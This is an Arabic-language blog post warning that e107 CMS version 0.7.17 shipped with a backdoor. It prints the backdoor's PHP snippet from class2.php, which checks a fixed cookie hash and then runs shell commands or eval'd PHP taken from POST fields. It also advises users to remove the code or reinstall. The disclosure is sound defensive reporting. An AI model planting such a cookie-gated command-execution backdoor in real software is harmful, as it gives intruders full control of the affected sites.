اكتشاف Backdoor في آخر إصدار من نظام إدارة المحتوى e107

ضمن التصنيفات: Open source ،Security ،Web.
الوقت المقدّر لقراءة هذا المقال: 1 دقيقة و 59 ثانية

اكتشاف Backdoor في آخر إصدار من نظام إدارة المحتوى e107

إذا كنت من هواة أنظمة إدارة المحتوى أو ما يعرف اختصارا بـ CMS و كنت أحد مستعملي نظام e107 فإنه يستحسن أن تتحقق من آخر إصدار من نظام e107 حيث أن تحاليل أثبتت احتواءه على Backdoor.

حيث نصح Bogdan Calin العامل لدى Acunetix بتجنب استعمال  الإصدار 0.7.17 التي صدرت حديثا لأنها تحوي الشيفرة التالية:

if(md5($_COOKIE[‘access-admin’]) == “cf1afec15669cb96f09befb7d70f8bcb”) {

if(!empty($_POST[‘cmd’])){
$out = execute($_POST[‘cmd’]);
}

elseif(!empty($_POST[‘php’])){
ob_start();
eval($_POST[‘php’]);
$out = ob_get_contents();
ob_end_clean();
}

في الملف class2.php .

و هو ما يعني استعمال لـ Cookie ثابت يسهل عملية اختراق النظام و الحصول على صلاحيات المدير.

من المرجح أن سبب وجود الـ Backdoor هو تعرض أحد الخوادم التي يُحمَّل منها النظام إلى تغيير في المحتوى.

إذا كنت تستعمل هذا النظام و كنت قد نصبت هذا الإصدار، كل ما عليك هو حذف الشيفرة المبنية أعلاه من الملف المصاب، أو إعادة تحميل النظام من جديد و الذي تم تصحيح الخلل فيه.

يمكن الإطلاع على تفاصيل الثغرة من هنا و هنا

–   هل تستعمل أنظمة إدارة المحتوى بصفة عامة و نظام e107 خاصة ؟

–   هل أنت من مؤيدي أنظمة أدارة المحتوى؟ أم تفضل كتابة جميع صفحات موقعك من الصفر؟


هل أعجبك هذا المقال؟ أخبر أصدقاءك عنه Share on Facebook
Facebook
0Tweet about this on Twitter
Twitter
Share on Google+
Google+
0Share on LinkedIn
Linkedin
Buffer this page
Buffer
Email this to someone
email
Share on Reddit
Reddit
0Share on Tumblr
Tumblr
0
وسوم: backdoorcmse107

عن كاتب المقال:

مُهندس برمجيات/مُبرمج جزائري

تابع الكاتب على:
Twitter +Google